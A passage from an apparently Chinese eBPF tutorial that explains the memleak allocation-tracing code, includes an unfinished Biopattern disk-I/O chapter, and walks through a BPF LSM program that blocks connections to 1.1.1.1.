<p>这些函数使用了 <code>BPF_KPROBE</code> 和 <code>BPF_KRETPROBE</code> 这两个宏来声明,这两个宏原本分别用于声明 kprobe(内核探针)和 kretprobe(内核返回探针)的处理函数:kprobe 在函数被调用时触发,而 kretprobe 则在函数返回时触发。在上面的代码中,它们与 <code>SEC("uprobe")</code> 和 <code>SEC("uretprobe")</code> 搭配使用,因此这些处理函数实际挂载的是用户态的探针。</p>
|
||
<p><code>gen_alloc_enter</code> 函数是在内存分配请求的开始时被调用的。这个函数主要负责在调用分配内存的函数时收集一些基本的信息。下面我们将深入探讨这个函数的实现。</p>
|
||
<pre><code class="language-c">static int gen_alloc_enter(size_t size)
|
||
{
|
||
if (size < min_size || size > max_size)
|
||
return 0;
|
||
|
||
if (sample_rate > 1) {
|
||
if (bpf_ktime_get_ns() % sample_rate != 0)
|
||
return 0;
|
||
}
|
||
|
||
const pid_t pid = bpf_get_current_pid_tgid() >> 32;
|
||
bpf_map_update_elem(&sizes, &pid, &size, BPF_ANY);
|
||
|
||
if (trace_all)
|
||
bpf_printk("alloc entered, size = %lu\n", size);
|
||
|
||
return 0;
|
||
}
|
||
|
||
SEC("uprobe")
|
||
int BPF_KPROBE(malloc_enter, size_t size)
|
||
{
|
||
return gen_alloc_enter(size);
|
||
}
|
||
</code></pre>
|
||
<p>首先,<code>gen_alloc_enter</code> 函数接收一个 <code>size</code> 参数,这个参数表示请求分配的内存的大小。如果这个值不在 <code>min_size</code> 和 <code>max_size</code> 之间,函数将直接返回,不再进行后续的操作。这样可以使工具专注于追踪特定范围的内存分配请求,过滤掉不感兴趣的分配请求。</p>
|
||
<p>接下来,函数检查采样率 <code>sample_rate</code>。如果 <code>sample_rate</code> 大于1,意味着我们不需要追踪所有的内存分配请求,而是周期性地追踪。这里使用 <code>bpf_ktime_get_ns</code> 获取当前的时间戳,然后通过取模运算来决定是否需要追踪当前的内存分配请求。这是一种常见的采样技术,用于降低性能开销,同时还能够提供一个代表性的样本用于分析。</p>
|
||
<p>之后,函数使用 <code>bpf_get_current_pid_tgid</code> 函数获取当前进程的 PID。注意该函数的返回值是一个 64 位整数,其中高 32 位是进程 ID(tgid),低 32 位是线程 ID,因此我们通过右移 32 位来获取真正的进程 ID。</p>
|
||
<p>函数接下来更新 <code>sizes</code> 这个 map,这个 map 以进程 ID 为键,以请求的内存分配大小为值。<code>BPF_ANY</code> 表示如果 key 已存在,那么更新 value,否则就新建一个条目。</p>
|
||
<p>最后,如果启用了 <code>trace_all</code> 标志,函数将打印一条信息,说明发生了内存分配。</p>
|
||
<p><code>BPF_KPROBE</code> 宏用于声明探针的处理函数,它使被探测函数的参数(这里是 <code>size</code>)可以直接作为处理函数的具名参数来使用。</p>
|
||
<p>最后定义了 <code>BPF_KPROBE(malloc_enter, size_t size)</code>,它会在 <code>malloc</code> 函数被调用时被 BPF uprobe 拦截执行,并通过 <code>gen_alloc_enter</code> 来记录内存分配大小。</p>
|
||
<p>我们刚刚分析了内存分配的入口函数 <code>gen_alloc_enter</code>,现在我们来关注这个过程的退出部分。具体来说,我们将讨论 <code>gen_alloc_exit2</code> 函数以及如何从内存分配调用中获取返回的内存地址。</p>
|
||
<pre><code class="language-c">static int gen_alloc_exit2(void *ctx, u64 address)
|
||
{
|
||
const pid_t pid = bpf_get_current_pid_tgid() >> 32;
|
||
struct alloc_info info;
|
||
|
||
const u64* size = bpf_map_lookup_elem(&sizes, &pid);
|
||
if (!size)
|
||
return 0; // missed alloc entry
|
||
|
||
__builtin_memset(&info, 0, sizeof(info));
|
||
|
||
info.size = *size;
|
||
bpf_map_delete_elem(&sizes, &pid);
|
||
|
||
if (address != 0) {
|
||
info.timestamp_ns = bpf_ktime_get_ns();
|
||
|
||
info.stack_id = bpf_get_stackid(ctx, &stack_traces, stack_flags);
|
||
|
||
bpf_map_update_elem(&allocs, &address, &info, BPF_ANY);
|
||
|
||
update_statistics_add(info.stack_id, info.size);
|
||
}
|
||
|
||
if (trace_all) {
|
||
bpf_printk("alloc exited, size = %lu, result = %lx\n",
|
||
info.size, address);
|
||
}
|
||
|
||
return 0;
|
||
}
|
||
static int gen_alloc_exit(struct pt_regs *ctx)
|
||
{
|
||
return gen_alloc_exit2(ctx, PT_REGS_RC(ctx));
|
||
}
|
||
|
||
SEC("uretprobe")
|
||
int BPF_KRETPROBE(malloc_exit)
|
||
{
|
||
return gen_alloc_exit(ctx);
|
||
}
|
||
</code></pre>
|
||
<p><code>gen_alloc_exit2</code> 函数在内存分配操作完成时被调用,这个函数接收两个参数,一个是上下文 <code>ctx</code>,另一个是内存分配函数返回的内存地址 <code>address</code>。</p>
|
||
<p>首先,它获取当前进程的 PID,然后使用这个 PID 作为键在 <code>sizes</code> 这个 map 中查找对应的内存分配大小。如果没有找到(也就是说,没有对应的内存分配操作的入口),函数就会直接返回。</p>
|
||
<p>接着,函数清除 <code>info</code> 结构体的内容,并设置它的 <code>size</code> 字段为之前在 map 中找到的内存分配大小。并从 <code>sizes</code> 这个 map 中删除相应的元素,因为此时内存分配操作已经完成,不再需要这个信息。</p>
|
||
<p>接下来,如果 <code>address</code> 不为 0(也就是说,内存分配操作成功了),函数就会进一步收集一些额外的信息。首先,它获取当前的时间戳作为内存分配完成的时间,并获取当前的堆栈跟踪。这些信息都会被储存在 <code>info</code> 结构体中,并随后更新到 <code>allocs</code> 这个 map 中。</p>
|
||
<p>最后,函数调用 <code>update_statistics_add</code> 更新统计数据,如果启用了所有内存分配操作的跟踪,函数还会打印一些关于内存分配操作的信息。</p>
|
||
<p>请注意,<code>gen_alloc_exit</code> 函数是 <code>gen_alloc_exit2</code> 的一个包装,它将 <code>PT_REGS_RC(ctx)</code> 作为 <code>address</code> 参数传递给 <code>gen_alloc_exit2</code>。在我们的讨论中,我们刚刚提到在 <code>gen_alloc_exit2</code> 函数中,调用了 <code>update_statistics_add</code> 函数以更新内存分配的统计数据。下面我们详细看一下这个函数的具体实现。</p>
|
||
<pre><code class="language-c">static void update_statistics_add(u64 stack_id, u64 sz)
|
||
{
|
||
union combined_alloc_info *existing_cinfo;
|
||
|
||
existing_cinfo = bpf_map_lookup_or_try_init(&combined_allocs, &stack_id, &initial_cinfo);
|
||
if (!existing_cinfo)
|
||
return;
|
||
|
||
const union combined_alloc_info incremental_cinfo = {
|
||
.total_size = sz,
|
||
.number_of_allocs = 1
|
||
};
|
||
|
||
__sync_fetch_and_add(&existing_cinfo->bits, incremental_cinfo.bits);
|
||
}
|
||
</code></pre>
|
||
<p><code>update_statistics_add</code> 函数接收两个参数:当前的堆栈 ID <code>stack_id</code> 以及内存分配的大小 <code>sz</code>。这两个参数都在内存分配事件中收集到,并且用于更新内存分配的统计数据。</p>
|
||
<p>首先,函数尝试在 <code>combined_allocs</code> 这个 map 中查找键值为当前堆栈 ID 的元素,如果找不到,就用 <code>initial_cinfo</code>(这是一个默认的 combined_alloc_info 结构体,所有字段都为零)来初始化新的元素。</p>
|
||
<p>接着,函数创建一个 <code>incremental_cinfo</code>,并设置它的 <code>total_size</code> 为当前内存分配的大小,设置 <code>number_of_allocs</code> 为 1。这是因为每次调用 <code>update_statistics_add</code> 函数都表示有一个新的内存分配事件发生,而这个事件的内存分配大小就是 <code>sz</code>。</p>
|
||
<p>最后,函数使用 <code>__sync_fetch_and_add</code> 函数原子地将 <code>incremental_cinfo</code> 的值加到 <code>existing_cinfo</code> 中。请注意这个步骤是线程安全的,即使有多个线程并发地调用 <code>update_statistics_add</code> 函数,每个内存分配事件也能正确地记录到统计数据中。</p>
|
||
<p>总的来说,<code>update_statistics_add</code> 函数实现了内存分配统计的更新逻辑,通过维护每个堆栈 ID 的内存分配总量和次数,我们可以深入了解到程序的内存分配行为。</p>
|
||
<p>在我们对内存分配的统计跟踪过程中,我们不仅要统计内存的分配,还要考虑内存的释放。在下面的代码中,我们定义了一个名为 <code>update_statistics_del</code> 的函数,其作用是在内存释放时更新统计信息。而 <code>gen_free_enter</code> 函数则是在进程调用 <code>free</code> 函数时被执行。</p>
|
||
<pre><code class="language-c">static void update_statistics_del(u64 stack_id, u64 sz)
|
||
{
|
||
union combined_alloc_info *existing_cinfo;
|
||
|
||
existing_cinfo = bpf_map_lookup_elem(&combined_allocs, &stack_id);
|
||
if (!existing_cinfo) {
|
||
bpf_printk("failed to lookup combined allocs\n");
|
||
return;
|
||
}
|
||
|
||
const union combined_alloc_info decremental_cinfo = {
|
||
.total_size = sz,
|
||
.number_of_allocs = 1
|
||
};
|
||
|
||
__sync_fetch_and_sub(&existing_cinfo->bits, decremental_cinfo.bits);
|
||
}
|
||
</code></pre>
|
||
<p><code>update_statistics_del</code> 函数的参数为堆栈 ID 和要释放的内存块大小。函数首先在 <code>combined_allocs</code> 这个 map 中使用当前的堆栈 ID 作为键来查找相应的 <code>combined_alloc_info</code> 联合体。如果找不到,就输出错误信息,然后函数返回。如果找到了,就会构造一个名为 <code>decremental_cinfo</code> 的 <code>combined_alloc_info</code> 联合体,设置它的 <code>total_size</code> 为要释放的内存大小,设置 <code>number_of_allocs</code> 为 1。然后使用 <code>__sync_fetch_and_sub</code> 函数原子地从 <code>existing_cinfo</code> 中减去 <code>decremental_cinfo</code> 的值。请注意,这里的 <code>number_of_allocs</code> 仍然是正数 1,分配次数的减少是由 <code>__sync_fetch_and_sub</code> 的减法操作完成的。</p>
|
||
<pre><code class="language-c">static int gen_free_enter(const void *address)
|
||
{
|
||
const u64 addr = (u64)address;
|
||
|
||
const struct alloc_info *info = bpf_map_lookup_elem(&allocs, &addr);
|
||
if (!info)
|
||
return 0;
|
||
|
||
bpf_map_delete_elem(&allocs, &addr);
|
||
update_statistics_del(info->stack_id, info->size);
|
||
|
||
if (trace_all) {
|
||
bpf_printk("free entered, address = %lx, size = %lu\n",
|
||
address, info->size);
|
||
}
|
||
|
||
return 0;
|
||
}
|
||
|
||
SEC("uprobe")
|
||
int BPF_KPROBE(free_enter, void *address)
|
||
{
|
||
return gen_free_enter(address);
|
||
}
|
||
</code></pre>
|
||
<p>接下来看 <code>gen_free_enter</code> 函数。它接收一个地址作为参数,这个地址是内存分配的结果,也就是将要释放的内存的起始地址。函数首先在 <code>allocs</code> 这个 map 中使用这个地址作为键来查找对应的 <code>alloc_info</code> 结构体。如果找不到,那么就直接返回,因为这意味着这个地址对应的分配没有被记录在 <code>allocs</code> 中。如果找到了,那么就删除这个元素,并且调用 <code>update_statistics_del</code> 函数来更新统计数据。最后,如果启用了 <code>trace_all</code> 标志,那么还会输出一条信息,包括这个地址以及它的大小。</p>
|
||
<p>在我们追踪和统计用户态内存分配的同时,我们也需要对内核态的内存分配和释放进行追踪。在Linux内核中,kmem_cache_alloc函数和kfree函数分别用于内核态的内存分配和释放。</p>
|
||
<pre><code class="language-c">SEC("tracepoint/kmem/kfree")
|
||
int memleak__kfree(void *ctx)
|
||
{
|
||
const void *ptr;
|
||
|
||
if (has_kfree()) {
|
||
struct trace_event_raw_kfree___x *args = ctx;
|
||
ptr = BPF_CORE_READ(args, ptr);
|
||
} else {
|
||
struct trace_event_raw_kmem_free___x *args = ctx;
|
||
ptr = BPF_CORE_READ(args, ptr);
|
||
}
|
||
|
||
return gen_free_enter(ptr);
|
||
}
|
||
</code></pre>
|
||
<p>上述代码片段定义了一个函数memleak__kfree,这是一个bpf程序,挂载在 kmem/kfree 这个 tracepoint 上,会在内核调用kfree函数时执行。首先,该函数通过 has_kfree() 判断应当使用哪一种 tracepoint 参数结构体:如果返回真,则把上下文当作 trace_event_raw_kfree 结构体,否则当作 trace_event_raw_kmem_free 结构体;两种情况下都通过 BPF_CORE_READ 读取其中的 ptr 字段(即要释放的内存块的地址),并保存到变量ptr中。接着,该函数会调用之前定义的gen_free_enter函数来处理该内存块的释放。</p>
|
||
<pre><code class="language-c">SEC("tracepoint/kmem/kmem_cache_alloc")
|
||
int memleak__kmem_cache_alloc(struct trace_event_raw_kmem_alloc *ctx)
|
||
{
|
||
if (wa_missing_free)
|
||
gen_free_enter(ctx->ptr);
|
||
|
||
gen_alloc_enter(ctx->bytes_alloc);
|
||
|
||
return gen_alloc_exit2(ctx, (u64)(ctx->ptr));
|
||
}
|
||
</code></pre>
|
||
<p>这段代码定义了一个函数 memleak__kmem_cache_alloc,这也是一个bpf程序,会在内核调用 kmem_cache_alloc 函数时执行。如果标记 wa_missing_free 被设置,则调用 gen_free_enter 函数处理可能遗漏的释放操作。然后,该函数会调用 gen_alloc_enter 函数来处理内存分配,最后调用gen_alloc_exit2函数记录分配的结果。</p>
|
||
<p>这两个 bpf 程序都使用了 SEC 宏定义了对应的 tracepoint,以便在相应的内核函数被调用时得到执行。在Linux内核中,tracepoint 是一种可以在内核中插入的静态钩子,可以用来收集运行时的内核信息,它在调试和性能分析中非常有用。</p>
|
||
<p>在理解这些代码的过程中,要注意 BPF_CORE_READ 宏的使用。这个宏用于在 bpf 程序中读取内核数据。在 bpf 程序中,我们不能直接访问内核内存,而需要使用这样的宏来安全地读取数据。</p>
|
||
<h3 id="用户态程序-1"><a class="header" href="#用户态程序-1">用户态程序</a></h3>
|
||
<p>在理解 BPF 内核部分之后,我们转到用户空间程序。用户空间程序与BPF内核程序紧密配合,它负责将BPF程序加载到内核,设置和管理BPF map,以及处理从BPF程序收集到的数据。用户态程序较长,我们这里可以简要参考一下它的挂载点。</p>
|
||
<pre><code class="language-c">int attach_uprobes(struct memleak_bpf *skel)
|
||
{
|
||
ATTACH_UPROBE_CHECKED(skel, malloc, malloc_enter);
|
||
ATTACH_URETPROBE_CHECKED(skel, malloc, malloc_exit);
|
||
|
||
ATTACH_UPROBE_CHECKED(skel, calloc, calloc_enter);
|
||
ATTACH_URETPROBE_CHECKED(skel, calloc, calloc_exit);
|
||
|
||
ATTACH_UPROBE_CHECKED(skel, realloc, realloc_enter);
|
||
ATTACH_URETPROBE_CHECKED(skel, realloc, realloc_exit);
|
||
|
||
ATTACH_UPROBE_CHECKED(skel, mmap, mmap_enter);
|
||
ATTACH_URETPROBE_CHECKED(skel, mmap, mmap_exit);
|
||
|
||
ATTACH_UPROBE_CHECKED(skel, posix_memalign, posix_memalign_enter);
|
||
ATTACH_URETPROBE_CHECKED(skel, posix_memalign, posix_memalign_exit);
|
||
|
||
ATTACH_UPROBE_CHECKED(skel, memalign, memalign_enter);
|
||
ATTACH_URETPROBE_CHECKED(skel, memalign, memalign_exit);
|
||
|
||
ATTACH_UPROBE_CHECKED(skel, free, free_enter);
|
||
ATTACH_UPROBE_CHECKED(skel, munmap, munmap_enter);
|
||
|
||
// the following probes are intentinally allowed to fail attachment
|
||
|
||
// deprecated in libc.so bionic
|
||
ATTACH_UPROBE(skel, valloc, valloc_enter);
|
||
ATTACH_URETPROBE(skel, valloc, valloc_exit);
|
||
|
||
// deprecated in libc.so bionic
|
||
ATTACH_UPROBE(skel, pvalloc, pvalloc_enter);
|
||
ATTACH_URETPROBE(skel, pvalloc, pvalloc_exit);
|
||
|
||
// added in C11
|
||
ATTACH_UPROBE(skel, aligned_alloc, aligned_alloc_enter);
|
||
ATTACH_URETPROBE(skel, aligned_alloc, aligned_alloc_exit);
|
||
|
||
return 0;
|
||
}
|
||
</code></pre>
|
||
<p>在这段代码中,我们看到一个名为<code>attach_uprobes</code>的函数,该函数负责将uprobes(用户空间探测点)挂载到内存分配和释放函数上。在Linux中,uprobes是一种内核机制,可以在用户空间程序中的任意位置设置断点,这使得我们可以非常精确地观察和控制用户空间程序的行为。</p>
|
||
<p>这里,大多数内存分配函数都通过两个探针进行跟踪:一个在函数入口(enter),一个在函数退出(exit);而 free 和 munmap 这样的释放函数只需要挂载入口探针。因此,每当这些函数被调用或返回时,都会触发一个 uprobe 事件,进而触发相应的BPF程序。</p>
|
||
<p>在具体的实现中,我们使用了<code>ATTACH_UPROBE</code>和<code>ATTACH_URETPROBE</code>两个宏来附加uprobes和uretprobes(函数返回探测点)。每个宏都需要三个参数:BPF程序的骨架(skel),要监视的函数名,以及要触发的BPF程序的名称。</p>
|
||
<p>这些挂载点包括常见的内存分配函数,如malloc、calloc、realloc、mmap、posix_memalign、memalign、free等,以及对应的退出点。另外,我们也观察一些可能的分配函数,如valloc、pvalloc、aligned_alloc等,尽管它们可能不总是存在。</p>
|
||
<p>这些挂载点的目标是捕获所有可能的内存分配和释放事件,从而使我们的内存泄露检测工具能够获取到尽可能全面的数据。这种方法可以让我们不仅能跟踪到内存分配和释放,还能得到它们发生的上下文信息,例如调用栈和调用次数,从而帮助我们定位和修复内存泄露问题。</p>
|
||
<p>注意,一些内存分配函数可能并不存在或已弃用,比如valloc、pvalloc等,因此它们的附加可能会失败。在这种情况下,我们允许附加失败,并不会阻止程序的执行。这是因为我们更关注的是主流和常用的内存分配函数,而这些已经被弃用的函数往往在实际应用中较少使用。</p>
|
||
<p>完整的源代码:<a href="https://github.com/eunomia-bpf/bpf-developer-tutorial/tree/main/src/16-memleak">https://github.com/eunomia-bpf/bpf-developer-tutorial/tree/main/src/16-memleak</a></p>
|
||
<h2 id="编译运行-5"><a class="header" href="#编译运行-5">编译运行</a></h2>
|
||
<pre><code class="language-console">$ git clone https://github.com/iovisor/bcc.git --recurse-submodules
|
||
$ cd bcc/libbpf-tools/
|
||
$ make memleak
|
||
$ sudo ./memleak
|
||
using default object: libc.so.6
|
||
using page size: 4096
|
||
tracing kernel: true
|
||
Tracing outstanding memory allocs... Hit Ctrl-C to end
|
||
[17:17:27] Top 10 stacks with outstanding allocations:
|
||
1236992 bytes in 302 allocations from stack
|
||
0 [<ffffffff812c8f43>] <null sym>
|
||
1 [<ffffffff812c8f43>] <null sym>
|
||
2 [<ffffffff812a9d42>] <null sym>
|
||
3 [<ffffffff812aa392>] <null sym>
|
||
4 [<ffffffff810df0cb>] <null sym>
|
||
5 [<ffffffff81edc3fd>] <null sym>
|
||
6 [<ffffffff82000b62>] <null sym>
|
||
...
|
||
</code></pre>
|
||
<h2 id="总结-14"><a class="header" href="#总结-14">总结</a></h2>
|
||
<p>通过本篇 eBPF 入门实践教程,您已经学习了如何编写 Memleak eBPF 监控程序,以实时监控程序的内存泄漏。您已经了解了 eBPF 在内存监控方面的应用,学会了使用 BPF API 编写 eBPF 程序,创建和使用 eBPF maps,并且明白了如何用 eBPF 工具监测和分析内存泄漏问题。我们展示了一个详细的例子,帮助您理解 eBPF 代码的运行流程和原理。</p>
|
||
<p>您可以访问我们的教程代码仓库 <a href="https://github.com/eunomia-bpf/bpf-developer-tutorial">https://github.com/eunomia-bpf/bpf-developer-tutorial</a> 以获取更多示例和完整的教程。</p>
|
||
<p>接下来的教程将进一步探讨 eBPF 的高级特性,我们会继续分享更多有关 eBPF 开发实践的内容。希望这些知识和技巧能帮助您更好地了解和使用 eBPF,以解决实际工作中遇到的问题。</p>
|
||
<div style="break-before: page; page-break-before: always;"></div><h1 id="ebpf-入门实践教程编写-ebpf-程序-biopattern-统计随机顺序磁盘-io"><a class="header" href="#ebpf-入门实践教程编写-ebpf-程序-biopattern-统计随机顺序磁盘-io">eBPF 入门实践教程:编写 eBPF 程序 Biopattern: 统计随机/顺序磁盘 I/O</a></h1>
|
||
<h2 id="背景-1"><a class="header" href="#背景-1">背景</a></h2>
|
||
<p>Biopattern 可以统计随机/顺序磁盘I/O次数的比例。</p>
|
||
<p>TODO</p>
|
||
<h2 id="实现原理-1"><a class="header" href="#实现原理-1">实现原理</a></h2>
|
||
<p>Biopattern 的ebpf代码在 tracepoint/block/block_rq_complete 挂载点下实现。在磁盘完成IO请求
|
||
后,程序会经过此挂载点。Biopattern 内部存有一张以设备号为主键的哈希表,当程序经过挂载点时, Biopattern
|
||
会获得操作信息,根据哈希表中该设备的上一次操作记录来判断本次操作是随机IO还是顺序IO,并更新操作计数。</p>
|
||
<h2 id="编写-ebpf-程序-1"><a class="header" href="#编写-ebpf-程序-1">编写 eBPF 程序</a></h2>
|
||
<p>TODO</p>
|
||
<h3 id="总结-15"><a class="header" href="#总结-15">总结</a></h3>
|
||
<p>Biopattern 可以展现随机/顺序磁盘I/O次数的比例,对于开发者把握整体I/O情况有较大帮助。</p>
|
||
<p>TODO</p>
|
||
<div style="break-before: page; page-break-before: always;"></div><h1 id="更多的参考资料"><a class="header" href="#更多的参考资料">更多的参考资料</a></h1>
|
||
<p>TODO</p>
|
||
<div style="break-before: page; page-break-before: always;"></div><h1 id="ebpf-入门实践教程使用-lsm-进行安全检测防御"><a class="header" href="#ebpf-入门实践教程使用-lsm-进行安全检测防御">eBPF 入门实践教程:使用 LSM 进行安全检测防御</a></h1>
|
||
<p>eBPF (扩展的伯克利数据包过滤器) 是一项强大的网络和性能分析工具,被广泛应用在 Linux 内核上。eBPF 使得开发者能够动态地加载、更新和运行用户定义的代码,而无需重启内核或更改内核源代码。这个特性使得 eBPF 能够提供极高的灵活性和性能,使其在网络和系统性能分析方面具有广泛的应用。安全方面的 eBPF 应用也是如此,本文将介绍如何使用 eBPF LSM(Linux Security Modules)机制实现一个简单的安全检查程序。</p>
|
||
<h2 id="背景-2"><a class="header" href="#背景-2">背景</a></h2>
|
||
<p>LSM 从 Linux 2.6 开始成为官方内核的一个安全框架,基于此的安全实现包括 SELinux 和 AppArmor 等。在 Linux 5.7 引入 BPF LSM 后,系统开发人员已经能够自由地实现函数粒度的安全检查能力,本文就提供了这样一个案例:限制通过 socket connect 函数对特定 IPv4 地址进行访问的 BPF LSM 程序。(可见其控制精度是很高的)</p>
|
||
<h2 id="lsm-概述"><a class="header" href="#lsm-概述">LSM 概述</a></h2>
|
||
<p>LSM(Linux Security Modules)是 Linux 内核中用于支持各种计算机安全模型的框架。LSM 在 Linux 内核安全相关的关键路径上预置了一批 hook 点,从而实现了内核和安全模块的解耦,使不同的安全模块可以自由地在内核中加载/卸载,无需修改原有的内核代码就可以加入安全检查功能。</p>
|
||
<p>在过去,使用 LSM 主要通过配置已有的安全模块(如 SELinux 和 AppArmor)或编写自己的内核模块;而在 Linux 5.7 引入 BPF LSM 机制后,一切都变得不同了:现在,开发人员可以通过 eBPF 编写自定义的安全策略,并将其动态加载到内核中的 LSM 挂载点,而无需配置或编写内核模块。</p>
|
||
<p>现在 LSM 支持的 hook 点包括但不限于:</p>
|
||
<ul>
|
||
<li>对文件的打开、创建、删除和移动等;</li>
|
||
<li>文件系统的挂载;</li>
|
||
<li>对 task 和 process 的操作;</li>
|
||
<li>对 socket 的操作(创建、绑定 socket,发送和接收消息等);</li>
|
||
</ul>
|
||
<p>更多 hook 点可以参考 <a href="https://github.com/torvalds/linux/blob/master/include/linux/lsm_hooks.h">lsm_hooks.h</a>。</p>
|
||
<h2 id="确认-bpf-lsm-是否可用"><a class="header" href="#确认-bpf-lsm-是否可用">确认 BPF LSM 是否可用</a></h2>
|
||
<p>首先,请确认内核版本不低于 5.7。接下来,可以通过</p>
|
||
<pre><code class="language-console">$ cat /boot/config-$(uname -r) | grep BPF_LSM
|
||
CONFIG_BPF_LSM=y
|
||
</code></pre>
|
||
<p>判断内核是否支持 BPF LSM。上述条件都满足的情况下,可以通过</p>
|
||
<pre><code class="language-console">$ cat /sys/kernel/security/lsm
|
||
landlock,lockdown,yama,integrity,apparmor
|
||
</code></pre>
|
||
<p>查看输出是否包含 bpf 选项,如果输出不包含(像上面的例子),可以通过修改 <code>/etc/default/grub</code>:</p>
|
||
<pre><code class="language-conf">GRUB_CMDLINE_LINUX="lsm=landlock,lockdown,yama,integrity,apparmor,bpf"
|
||
</code></pre>
|
||
<p>并通过 <code>update-grub2</code> 命令更新 grub 配置(不同系统的对应命令可能不同),然后重启系统。</p>
|
||
<h2 id="编写-ebpf-程序-2"><a class="header" href="#编写-ebpf-程序-2">编写 eBPF 程序</a></h2>
|
||
<pre><code class="language-C">// lsm-connect.bpf.c
|
||
#include "vmlinux.h"
|
||
#include <bpf/bpf_core_read.h>
|
||
#include <bpf/bpf_helpers.h>
|
||
#include <bpf/bpf_tracing.h>
|
||
|
||
char LICENSE[] SEC("license") = "GPL";
|
||
|
||
#define EPERM 1
|
||
#define AF_INET 2
|
||
|
||
const __u32 blockme = 16843009; // 1.1.1.1 -> int
|
||
|
||
SEC("lsm/socket_connect")
|
||
int BPF_PROG(restrict_connect, struct socket *sock, struct sockaddr *address, int addrlen, int ret)
|
||
{
|
||
// Satisfying "cannot override a denial" rule
|
||
if (ret != 0)
|
||
{
|
||
return ret;
|
||
}
|
||
|
||
// Only IPv4 in this example
|
||
if (address->sa_family != AF_INET)
|
||
{
|
||
return 0;
|
||
}
|
||
|
||
// Cast the address to an IPv4 socket address
|
||
struct sockaddr_in *addr = (struct sockaddr_in *)address;
|
||
|
||
// Where do you want to go?
|
||
__u32 dest = addr->sin_addr.s_addr;
|
||
bpf_printk("lsm: found connect to %d", dest);
|
||
|
||
if (dest == blockme)
|
||
{
|
||
bpf_printk("lsm: blocking %d", dest);
|
||
return -EPERM;
|
||
}
|
||
return 0;
|
||
}
|
||
|
||
</code></pre>
|
||
<p>这是一段 C 实现的 eBPF 内核侧代码,它会阻止所有试图通过 socket 对 1.1.1.1 的连接操作,其中:</p>
|
||
<ul>
|
||
<li><code>SEC("lsm/socket_connect")</code> 宏指出该程序期望的挂载点;</li>
|
||
<li>程序通过 <code>BPF_PROG</code> 宏定义(详情可查看 <a href="https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git/tree/tools/lib/bpf/bpf_tracing.h">tools/lib/bpf/bpf_tracing.h</a>);</li>
|
||
<li><code>restrict_connect</code> 是 <code>BPF_PROG</code> 宏要求的程序名;</li>
|
||
<li><code>ret</code> 是该挂载点上(潜在的)当前函数之前的 LSM 检查程序的返回值;</li>
|
||
</ul>
|
||
<p>整个程序的思路不难理解:</p>
|
||
<ul>
|
||
<li>首先,若其他安全检查函数返回值不为 0(不通过),则无需检查,直接返回不通过;</li>
|
||
<li>接下来,判断是否为 IPv4 的连接请求,并比较试图连接的地址是否为 1.1.1.1;</li>
|
||
<li>若请求地址为 1.1.1.1 则拒绝连接,否则允许连接;</li>
|
||
</ul>
|
||
<p>在程序运行期间,所有通过 socket 的连接操作都会被输出到 <code>/sys/kernel/debug/tracing/trace_pipe</code>。</p>
|
||
<h2 id="编译运行-6"><a class="header" href="#编译运行-6">编译运行</a></h2>
|
||
<p>通过容器编译:</p>
|
||
<pre><code class="language-console">docker run -it -v `pwd`/:/src/ ghcr.io/eunomia-bpf/ecc-`uname -m`:latest
|
||
</code></pre>
|
||
<p>或是通过 <code>ecc</code> 编译:</p>
|
||
<pre><code class="language-console">$ ecc lsm-connect.bpf.c
|
||
Compiling bpf object...
|
||
Packing ebpf object and config into package.json...
|
||
</code></pre>
|
||
<p>并通过 <code>ecli</code> 运行:</p>
|
||
<pre><code class="language-shell">sudo ecli run package.json
|
||
</code></pre>
|
||
<p>接下来,可以打开另一个 terminal,并尝试访问 1.1.1.1:</p>
|
||
<pre><code class="language-console">$ ping 1.1.1.1
|
||
ping: connect: Operation not permitted
|
||
$ curl 1.1.1.1
|
||
curl: (7) Couldn't connect to server
|
||
$ wget 1.1.1.1
|
||
--2023-04-23 08:41:18-- (try: 2) http://1.1.1.1/
|
||
Connecting to 1.1.1.1:80... failed: Operation not permitted.
|
||
Retrying.
|
||
</code></pre>
|
||
<p>同时,我们可以查看 <code>bpf_printk</code> 的输出:</p>
|
||
<pre><code class="language-console">$ sudo cat /sys/kernel/debug/tracing/trace_pipe
|
||
ping-7054 [000] d...1 6313.430872: bpf_trace_printk: lsm: found connect to 16843009
|
||
ping-7054 [000] d...1 6313.430874: bpf_trace_printk: lsm: blocking 16843009
|
||
curl-7058 [000] d...1 6316.346582: bpf_trace_printk: lsm: found connect to 16843009
|
||
curl-7058 [000] d...1 6316.346584: bpf_trace_printk: lsm: blocking 16843009
|
||
wget-7061 [000] d...1 6318.800698: bpf_trace_printk: lsm: found connect to 16843009
|
||
wget-7061 [000] d...1 6318.800700: bpf_trace_printk: lsm: blocking 16843009
|
||
</code></pre>
|
||
<p>完整源代码:<a href="https://github.com/eunomia-bpf/bpf-developer-tutorial/tree/main/src/19-lsm-connect">https://github.com/eunomia-bpf/bpf-developer-tutorial/tree/main/src/19-lsm-connect</a></p>
|
||
<h2 id="总结-16"><a class="header" href="#总结-16">总结</a></h2>
|
||
<p>本文介绍了如何使用 BPF LSM 来限制通过 socket 对特定 IPv4 地址的访问。我们可以通过修改 GRUB 配置文件来开启 LSM 的 BPF 挂载点。在 eBPF 程序中,我们通过 <code>BPF_PROG</code> 宏定义函数,并通过 <code>SEC</code> 宏指定挂载点;在函数实现上,遵循 LSM 安全检查模块中 "cannot override a denial" 的原则,并根据 socket 连接请求的目的地址对该请求进行限制。</p>
|
||
<p>如果您希望学习更多关于 eBPF 的知识和实践,可以访问我们的教程代码仓库 <a href="https://github.com/eunomia-bpf/bpf-developer-tutorial">https://github.com/eunomia-bpf/bpf-developer-tutorial</a> 以获取更多示例和完整的教程。</p>
|
||
<h2 id="参考"><a class="header" href="#参考">参考</a></h2>
|
||
<ul>
|
||
<li><a href="https://github.com/leodido/demo-cloud-native-ebpf-day">https://github.com/leodido/demo-cloud-native-ebpf-day</a></li>
|
||
<li><a href="https://aya-rs.dev/book/programs/lsm/#writing-lsm-bpf-program">https://aya-rs.dev/book/programs/lsm/#writing-lsm-bpf-program</a></li>
|
||
</ul>
|
||
<div style="break-before: page; page-break-before: always;"></div><h1 id="ebpf-入门实践教程二十使用-ebpf-进行-tc-流量控制"><a class="header" href="#ebpf-入门实践教程二十使用-ebpf-进行-tc-流量控制">eBPF 入门实践教程二十:使用 eBPF 进行 tc 流量控制</a></h1>
|
||
<h2 id="背景-3"><a class="header" href="#背景-3">背景</a></h2>
|
||
